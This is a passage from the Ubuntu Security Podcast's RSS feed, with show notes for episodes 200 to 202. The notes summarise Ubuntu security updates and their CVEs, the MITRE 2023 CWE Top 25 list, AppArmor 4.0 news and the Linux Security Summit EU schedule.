<li>Time for another frequent mention in the podcast - ImageMagick (seems to come
up every 10 episodes or so)</li>
<li>Huge range of CVEs fixed across the various releases with some dating back to
2020</li>
<li>OOB read, stack bufffer overflow, NULL ptr deref, lots of heap buffer overflows</li>
<li>Since 20.04, ImageMagick is now in universe, so for 20.04 LTS this update is
available via Ubuntu Pro</li>
</ul>
<h3 id="usn-6201-1-firefox-vulnerabilities--12-27">[<a href="https://ubuntu.com/security/notices/USN-6201-1">USN-6201-1</a>] Firefox vulnerabilities (12:27)</h3>
<ul>
<li>13 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-37208">CVE-2023-37208</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-37206">CVE-2023-37206</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-37204">CVE-2023-37204</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-37203">CVE-2023-37203</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3482">CVE-2023-3482</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-37212">CVE-2023-37212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-37211">CVE-2023-37211</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-37210">CVE-2023-37210</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-37209">CVE-2023-37209</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-37207">CVE-2023-37207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-37205">CVE-2023-37205</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-37202">CVE-2023-37202</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-37201">CVE-2023-37201</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>115.0</li>
<li>Usual web browser issues (DoS, domain bypass, RCE etc) - but also bypass of
cookie storage protections, possible spoofing attack via fullscreen
notifications and others</li>
</ul>
<h3 id="usn-6202-1-containerd-vulnerabilities--13-09">[<a href="https://ubuntu.com/security/notices/USN-6202-1">USN-6202-1</a>] containerd vulnerabilities (13:09)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-25173">CVE-2023-25173</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25153">CVE-2023-25153</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>DoS when importing an OCI image with a really large manifest or image layout
file - would try and read the whole JSON file into memory - could cause
containerd to crash by running out of memory - limited to 20MBs</li>
</ul>
<h3 id="usn-6203-1-django-vulnerability--13-55">[<a href="https://ubuntu.com/security/notices/USN-6203-1">USN-6203-1</a>] Django vulnerability (13:55)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-36053">CVE-2023-36053</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ReDoS in EmailValidator and URLValidator classes when parsing really long
strings - fixed by rejecting anything longer than some hardcoded constants
(2KB for URL, 320 chars for email as per RFC x3696)</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="apparmor-4-dot-0-alpha1-in-progress--14-44">AppArmor 4.0-alpha1 in progress (14:44)</h3>
<ul>
<li><a href="https://gitlab.com/apparmor/apparmor/-/wikis/Release_Notes_4.0-alpha1">https://gitlab.com/apparmor/apparmor/-/wikis/Release_Notes_4.0-alpha1</a></li>
<li>&ldquo;Bridge&rdquo; between 3.0 style policy and new 4.0 policy</li>
<li>New profile flags
<ul>
<li>unconfined, debug</li>
</ul>
</li>
<li>New mediation types
<ul>
<li><a href="https://gitlab.com/apparmor/apparmor/-/wikis/mqueue-rules">Fine grained POSIX message queues</a></li>
<li><a href="https://gitlab.com/apparmor/apparmor/-/wikis/unprivileged_userns_restriction">User namespaces</a></li>
<li><a href="https://gitlab.com/apparmor/apparmor/-/wikis/io_uring-rules">io_uring</a></li>
</ul>
</li>
<li>Minor changes
<ul>
<li>Ability to filter the output of aa-status</li>
<li>Inclusion of a new utility called aa-load which can load pre-compiled /
cached binary policies without the use of <code>apparmor_parser</code></li>
<li>Ability to run and compile policies as an unprivileged user (still need to
be root to actually load the policy into the kernel)</li>
</ul>
</li>
</ul>
<h3 id="apparmor-kernel-fixes-for-linux-6-dot-5--20-42">AppArmor kernel fixes for Linux 6.5 (20:42)</h3>
<ul>
<li><a href="https://lore.kernel.org/all/b68ad9e0-2ce1-50d5-4856-e4d8fe97fc82@canonical.com/">https://lore.kernel.org/all/b68ad9e0-2ce1-50d5-4856-e4d8fe97fc82@canonical.com/</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E202.mp3" length="21757397" type="audio/mpeg" /><itunes:duration>1300</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 201
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-201/</link>
          <pubDate>Fri, 30 Jun 2023 14:49:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>1a5a33984b59b0c901a90c2f627707d238fbd027424b02f28e2d031dc16cd7606583d07d407b63db90a87b63b2df2231dbb14786cbd9d11159454fae21a3d9a8</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 201</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at the top 25 most dangerous vulnerability types, as well as
  the announcement of the program for LSS EU, and we cover security updates for
  Bind, the Linux kernel, CUPS, etcd and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at the top 25 most dangerous vulnerability types, as well as
  the announcement of the program for LSS EU, and we cover security updates for
  Bind, the Linux kernel, CUPS, etcd and more.
  </itunes:summary>
        <description>  This week we look at the top 25 most dangerous vulnerability types, as well as
  the announcement of the program for LSS EU, and we cover security updates for
  Bind, the Linux kernel, CUPS, etcd and more.
  </description>
        <googleplay:description>  This week we look at the top 25 most dangerous vulnerability types, as well as
  the announcement of the program for LSS EU, and we cover security updates for
  Bind, the Linux kernel, CUPS, etcd and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at the top 25 most dangerous vulnerability types, as well as
the announcement of the program for LSS EU, and we cover security updates for
Bind, the Linux kernel, CUPS, etcd and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>36 unique CVEs addressed</p>
<h3 id="usn-6183-1-bind-vulnerabilities--00-53">[<a href="https://ubuntu.com/security/notices/USN-6183-1">USN-6183-1</a>] Bind vulnerabilities (00:53)</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2911">CVE-2023-2911</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2828">CVE-2023-2828</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Two DoS issues - when bind was configured as a recursive resolver, possible to
cause the configured cache size to be exceeded by a remote attacker by
performing queries in a particular manner (as this would then evade the normal
cache cleaning algorithm) - DoS due to excessive memory usage -&gt; OOM killer
etc</li>
<li>The other was due to a recursive algorithm that could be triggered in a
pathological way when particular configuration options were used - eventually
would exhaust the available stack space -&gt; killed by stack protections -&gt; DoS</li>
</ul>
<h3 id="usn-6185-1-linux-kernel-vulnerabilities--01-52">[<a href="https://ubuntu.com/security/notices/USN-6185-1">USN-6185-1</a>] Linux kernel vulnerabilities (01:52)</h3>
<ul>
<li>8 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2985">CVE-2023-2985</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25012">CVE-2023-25012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1998">CVE-2023-1998</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1859">CVE-2023-1859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1670">CVE-2023-1670</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1079">CVE-2023-1079</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1077">CVE-2023-1077</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1076">CVE-2023-1076</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 - IBM, GCP, GKEOP, raspi2, Azure, AWS, Bluefield, KVM, Oracle</li>
<li>type confusion in real-time scheduler -&gt; DoS</li>
<li>few different UAF in various USB device drivers (and even PCMCIA) - could all
be triggered by a local attacker with physical access</li>
<li>UAF in HFS+ file-system + Xen 9P file-system protocol impl</li>
</ul>
<h3 id="usn-6187-1-linux-kernel--ibm--vulnerabilities--02-49">[<a href="https://ubuntu.com/security/notices/USN-6187-1">USN-6187-1</a>] Linux kernel (IBM) vulnerabilities (02:49)</h3>
<ul>
<li>9 CVEs addressed in Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2985">CVE-2023-2985</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25012">CVE-2023-25012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1998">CVE-2023-1998</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1859">CVE-2023-1859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1670">CVE-2023-1670</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1079">CVE-2023-1079</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1077">CVE-2023-1077</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1076">CVE-2023-1076</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4269">CVE-2022-4269</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.19 IBM</li>
<li>All of the above plus a possible deadlock in the network traffic control
subsystem that could be triggered by a local attacker -&gt; DoS</li>
</ul>
<h3 id="usn-6186-1-linux-kernel-vulnerabilities--03-06">[<a href="https://ubuntu.com/security/notices/USN-6186-1">USN-6186-1</a>] Linux kernel vulnerabilities (03:06)</h3>
<ul>
<li>20 CVEs addressed in Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-33288">CVE-2023-33288</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-33203">CVE-2023-33203</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30772">CVE-2023-30772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28866">CVE-2023-28866</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28466">CVE-2023-28466</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2612">CVE-2023-2612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2235">CVE-2023-2235</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2194">CVE-2023-2194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1990">CVE-2023-1990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1989">CVE-2023-1989</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1859">CVE-2023-1859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1855">CVE-2023-1855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1670">CVE-2023-1670</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1611">CVE-2023-1611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1583">CVE-2023-1583</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4269">CVE-2022-4269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1380">CVE-2023-1380</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30456">CVE-2023-30456</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31436">CVE-2023-31436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32233">CVE-2023-32233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>All interesting CVEs discussed previously - <a href="/episode-198/#usn-6130-1-linux-kernel-vulnerabilities--02-23">[USN-6130-1] Linux kernel vulnerabilities in Episode 198</a>
<ul>
<li>netfilter race condition able to be triggered by a local attacker -&gt; UAF -&gt; DoS/RCE</li>
<li>OOB read in the USB handling code for Broadcom FullMAC USB WiFi driver</li>
<li>KVM mishandling of control registers for nested guest VMs</li>
<li>OOB write in network queuing scheduler - able to be triggered though an
unprivileged user namespace (again)</li>
</ul>
</li>
</ul>
<h3 id="usn-6184-1-cups-vulnerability--03-55">[<a href="https://ubuntu.com/security/notices/USN-6184-1">USN-6184-1</a>] CUPS vulnerability (03:55)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-34241">CVE-2023-34241</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF since would log details of a connection after closing the connection (and
hence freeing the memory associated with the connection) - since was in the
logging code, would only happen if the log level was set to <code>warn</code> or higher -
could then either cause a crash (SEGV etc) or could potentially end up logging
sensitive info if that was then present in that memory location</li>
</ul>
<h3 id="usn-6188-1-openssl-vulnerability--04-43">[<a href="https://ubuntu.com/security/notices/USN-6188-1">USN-6188-1</a>] OpenSSL vulnerability (04:43)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2650">CVE-2023-2650</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-197/#usn-6119-1-openssl-vulnerabilities--13-20">[USN-6119-1] OpenSSL vulnerabilities from Episode 197</a></li>
<li>CPU-based DoS when parsing crafted ASN.1 object identifiers</li>
</ul>
<h3 id="usn-6161-2-dot-net-regression--05-02">[<a href="https://ubuntu.com/security/notices/USN-6161-2">USN-6161-2</a>] .NET regression (05:02)</h3>
<ul>
<li>5 CVEs addressed in Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-33128">CVE-2023-33128</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32032">CVE-2023-32032</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29337">CVE-2023-29337</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29331">CVE-2023-29331</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-24936">CVE-2023-24936</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-199/#usn-6161-1-dot-net-vulnerabilities--09-02">[USN-6161-1] .NET vulnerabilities from Episode 199</a></li>
<li>New upstream point release to address a regression in the previous release -
would fail to import PKCS12 blobs where the private keys were protected by a
null password (apparently this was non-deterministic which sounds like it was
due to an uninitialised local variable&hellip;?)</li>
</ul>
<h3 id="usn-6189-1-etcd-vulnerability--05-55">[<a href="https://ubuntu.com/security/notices/USN-6189-1">USN-6189-1</a>] etcd vulnerability (05:55)</h3>
<ul>
<li>1 CVEs addressed in Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-28235">CVE-2021-28235</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Leaked credentials into the debug log which could then be accessed by a remote
attacker via the debug API endpoint</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="mitre-2023-cwe-top-25-most-dangerous-software-weaknesses-published--06-20">MITRE 2023 CWE Top 25 Most Dangerous Software Weaknesses published (06:20)</h3>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>ID</th>
          <th>Name</th>
          <th>Score</th>
          <th>CVEs in KEV</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>CWE-787</td>
          <td>Out-of-bounds Write</td>
          <td>63.72</td>
          <td>70</td>
      </tr>
      <tr>
          <td>2</td>
          <td>CWE-79</td>
          <td>Improper Neutralization of Input During Web Page Generation (&lsquo;Cross-site Scripting&rsquo;)</td>
          <td>45.54</td>
          <td>4</td>
      </tr>
      <tr>
          <td>3</td>
          <td>CWE-89</td>
          <td>Improper Neutralization of Special Elements used in an SQL Command (&lsquo;SQL Injection&rsquo;)</td>
          <td>34.27</td>
          <td>6</td>
      </tr>
      <tr>
          <td>4</td>
          <td>CWE-416</td>
          <td>Use After Free</td>
          <td>16.71</td>
          <td>44</td>
      </tr>
      <tr>
          <td>5</td>
          <td>CWE-78</td>
          <td>Improper Neutralization of Special Elements used in an OS Command (&lsquo;OS Command Injection&rsquo;)</td>
          <td>15.65</td>
          <td>23</td>
      </tr>
      <tr>
          <td>6</td>
          <td>CWE-20</td>
          <td>Improper Input Validation</td>
          <td>15.50</td>
          <td>35</td>
      </tr>
      <tr>
          <td>7</td>
          <td>CWE-125</td>
          <td>Out-of-bounds Read</td>
          <td>14.60</td>
          <td>2</td>
      </tr>
      <tr>
          <td>8</td>
          <td>CWE-22</td>
          <td>Improper Limitation of a Pathname to a Restricted Directory (&lsquo;Path Traversal&rsquo;)</td>
          <td>14.11</td>
          <td>16</td>
      </tr>
      <tr>
          <td>9</td>
          <td>CWE-352</td>
          <td>Cross-Site Request Forgery (CSRF)</td>
          <td>11.73</td>
          <td>0</td>
      </tr>
      <tr>
          <td>10</td>
          <td>CWE-434</td>
          <td>Unrestricted Upload of File with Dangerous Type</td>
          <td>10.41</td>
          <td>5</td>
      </tr>
      <tr>
          <td>11</td>
          <td>CWE-862</td>
          <td>Missing Authorization</td>
          <td>6.90</td>
          <td>0</td>
      </tr>
      <tr>
          <td>12</td>
          <td>CWE-476</td>
          <td>NULL Pointer Dereference</td>
          <td>6.59</td>
          <td>0</td>
      </tr>
      <tr>
          <td>13</td>
          <td>CWE-287</td>
          <td>Improper Authentication</td>
          <td>6.39</td>
          <td>10</td>
      </tr>
      <tr>
          <td>14</td>
          <td>CWE-190</td>
          <td>Integer Overflow or Wraparound</td>
          <td>5.89</td>
          <td>4</td>
      </tr>
      <tr>
          <td>15</td>
          <td>CWE-502</td>
          <td>Deserialization of Untrusted Data</td>
          <td>5.56</td>
          <td>14</td>
      </tr>
      <tr>
          <td>16</td>
          <td>CWE-77</td>
          <td>Improper Neutralization of Special Elements used in a Command (&lsquo;Command Injection&rsquo;)</td>
          <td>4.95</td>
          <td>4</td>
      </tr>
      <tr>
          <td>17</td>
          <td>CWE-119</td>
          <td>Improper Restriction of Operations within the Bounds of a Memory Buffer</td>
          <td>4.75</td>
          <td>7</td>
      </tr>
      <tr>
          <td>18</td>
          <td>CWE-798</td>
          <td>Use of Hard-coded Credentials</td>
          <td>4.57</td>
          <td>2</td>
      </tr>
      <tr>
          <td>19</td>
          <td>CWE-918</td>
          <td>Server-Side Request Forgery (SSRF)</td>
          <td>4.56</td>
          <td>16</td>
      </tr>
      <tr>
          <td>20</td>
          <td>CWE-306</td>
          <td>Missing Authentication for Critical Function</td>
          <td>3.78</td>
          <td>8</td>
      </tr>
      <tr>
          <td>21</td>
          <td>CWE-362</td>
          <td>Concurrent Execution using Shared Resource with Improper Synchronization (&lsquo;Race Condition&rsquo;)</td>
          <td>3.53</td>
          <td>8</td>
      </tr>
      <tr>
          <td>22</td>
          <td>CWE-269</td>
          <td>Improper Privilege Management</td>
          <td>3.31</td>
          <td>5</td>
      </tr>
      <tr>
          <td>23</td>
          <td>CWE-94</td>
          <td>Improper Control of Generation of Code (&lsquo;Code Injection&rsquo;)</td>
          <td>3.30</td>
          <td>6</td>
      </tr>
      <tr>
          <td>24</td>
          <td>CWE-863</td>
          <td>Incorrect Authorization</td>
          <td>3.16</td>
          <td>0</td>
      </tr>
      <tr>
          <td>25</td>
          <td>CWE-276</td>
          <td>Incorrect Default Permissions</td>
          <td>3.16</td>
          <td>0</td>
      </tr>
  </tbody>
</table>
<ul>
<li><a href="https://cwe.mitre.org/top25/archive/2023/2023_top25_list.html">https://cwe.mitre.org/top25/archive/2023/2023_top25_list.html</a></li>
<li>MITRE (operates the US Homeland Security Systems Engineering and Development
Institute) released the 2023 CWE Top 25 Most Dangerous Software Weaknesses</li>
<li>Calculated by analysing the previous 2 years worth of public vulnerability
data from NVD for their various root-causes and ranking those</li>
<li>Also incorporates updates weakness data for the CVEs that form CISA&rsquo;s (US
Cybersecurity &amp; Infrastructure Security Agency) known exploited
vulnerabilities catalog (KEV)</li>
<li>root-causes - CWE - common weakness enumeration - list of software and
hardware weakness types</li>
<li>Looked at CVEs published in 2021 and 2022 and used those where the CWEs could
be mapped to the simplified collection of 130 weakness types which are the
most common set</li>
<li>Each CVE published by NVD has associated CWEs that identify the root-case for
the vulnerability - these are generally chosen by the CNA who assigns the CVE
(as they are most familiar with the product and vulnerability in question) or
by an NVD analyst - multiple CWEs can be assigned for a CVE since they can
often be part of chain</li>
<li>Score was calculated as the frequency of the CWE compared to other CWEs in the
dataset, multiplied by the average CVSS score for all CVEs that had the CWE
<ul>
<li>Have spoken in the past about perceived inaccuracies in CVSS scores and how
they are not necessarily a good fit for determining the risk of a given
CVE - but in this case, using them as the basis for this calculation is
perhaps not awful as they are the only real objective measure of the
potential <strong>severity</strong> of a CVE - and this is a noisy measure anyway</li>
</ul>
</li>
<li>Looking at the top 10, OOB writes come in way at the top with a score of 63.7,
then XSS (45.5), SQLi (34.3) after which follows a long tail of CWEs with
scores in the teens - UAF (16.7), OS Command Injection (15.6), Improper Input
Validation (15.5), OOB Read (14.6), Path Traversal (14.11), CSRF (11.73) and
finally Unrestricted Upload of File with Dangerous Type (10.4)
<ul>
<li>Interesting to see the top 3 have a much higher score (all over 34) where as
the rest are half this - below 16</li>
</ul>
</li>
<li>They also quote the number of CVEs that featured in the KEV list (known
exploited vulns) - OOB W (70) yet XSS (4) + SQLi (6) - so just because there
are more of a given type of vuln, doesn&rsquo;t mean that they get exploited more -
e.g. OOB reads are #7 yet only 2 in the list of KEV, and CSRF #9 yet none in
the KEV list</li>
<li>What does this mean for Ubuntu Security? Ultimately it is interesting and
seems to back up our more traditional approach to CVE priority assignment
compared to trying to use CVSS as a priority (again this is a severity score
but doesn&rsquo;t really indicate risk, which is what our traditional priority score
is based on) - but perhaps is more interesting from an industry point of
view - memory corruption vulns (OOB Writes) still most prevalent and
impactful - static / dynamic analysis still very important to try and find
these - but ultimately the move to memory safe languages (Rust, Go etc) is
where we will finally see a shift away from this dominance</li>
<li>Even then, will still be security bugs (XSS + SQLi, OS Command Injection,
Improper Input Validation, Path Traveral, CSRF etc)</li>
</ul>
<h3 id="linux-security-summit-eu-schedule-published--17-16">Linux Security Summit EU Schedule Published (17:16)</h3>
<ul>
<li><a href="https://events.linuxfoundation.org/linux-security-summit-europe/program/schedule/">https://events.linuxfoundation.org/linux-security-summit-europe/program/schedule/</a></li>
<li>20-21 September - in Bilbao Spain alongside the Open Source Summit</li>
<li>Still chance to get Early Bird Registration (closes 6th July)</li>
<li>BPF, exploit detection, estimating security risk of a given OSS project,
OP-TEE (ARM Trust-Zone) usage, novel project using CHERI hardware architecture
to protect security sensitive parts of the kernel, using TPM for per-process
secret storage, secure boot, LSM Updates + LandLock and some more</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E201.mp3" length="20883398" type="audio/mpeg" /><itunes:duration>1213</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 200
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-200/</link>
          <pubDate>Fri, 23 Jun 2023 18:47:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>317b704969a4c992e2e3179014dc72de646f1136def7c468d55bf7654dfc90c8f454e84cd3b17ecd06d071ee0021c01b011f12612816e14baf0296927b21d93a</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 200</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          For our 200th episode, we discuss the impact of Red Hat's decision to stop
  publicly releasing the RHEL source code, plus we cover security updates for
  libX11, GNU SASL, QEMU, VLC, pngcheck, the Linux kernel and a whole lot more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  For our 200th episode, we discuss the impact of Red Hat's decision to stop
  publicly releasing the RHEL source code, plus we cover security updates for
  libX11, GNU SASL, QEMU, VLC, pngcheck, the Linux kernel and a whole lot more.
  </itunes:summary>
        <description>  For our 200th episode, we discuss the impact of Red Hat's decision to stop
  publicly releasing the RHEL source code, plus we cover security updates for
  libX11, GNU SASL, QEMU, VLC, pngcheck, the Linux kernel and a whole lot more.
  </description>
        <googleplay:description>  For our 200th episode, we discuss the impact of Red Hat's decision to stop
  publicly releasing the RHEL source code, plus we cover security updates for
  libX11, GNU SASL, QEMU, VLC, pngcheck, the Linux kernel and a whole lot more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>For our 200th episode, we discuss the impact of Red Hat&rsquo;s decision to stop
publicly releasing the RHEL source code, plus we cover security updates for
libX11, GNU SASL, QEMU, VLC, pngcheck, the Linux kernel and a whole lot more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>73 unique CVEs addressed</p>
<h3 id="usn-6163-1-pano13-vulnerabilities--01-08">[<a href="https://ubuntu.com/security/notices/USN-6163-1">USN-6163-1</a>] pano13 vulnerabilities (01:08)</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-33293">CVE-2021-33293</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20307">CVE-2021-20307</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>use by hugin-tools for stitching together photos into a panorama</li>
<li>format-string vuln in <code>PTcrop</code> utility which could be abused to execute arbitrary code etc</li>
<li>OOB read (looks more like a NULL ptr deref from the upstream patch&hellip;) when
parsing TIFF images</li>
</ul>
<h3 id="usn-6168-1-usn-6168-2-libx11-vulnerability--01-55">[<a href="https://ubuntu.com/security/notices/USN-6168-1">USN-6168-1</a>, <a href="https://ubuntu.com/security/notices/USN-6168-2">USN-6168-2</a>] libx11 vulnerability (01:55)</h3>
<ul>
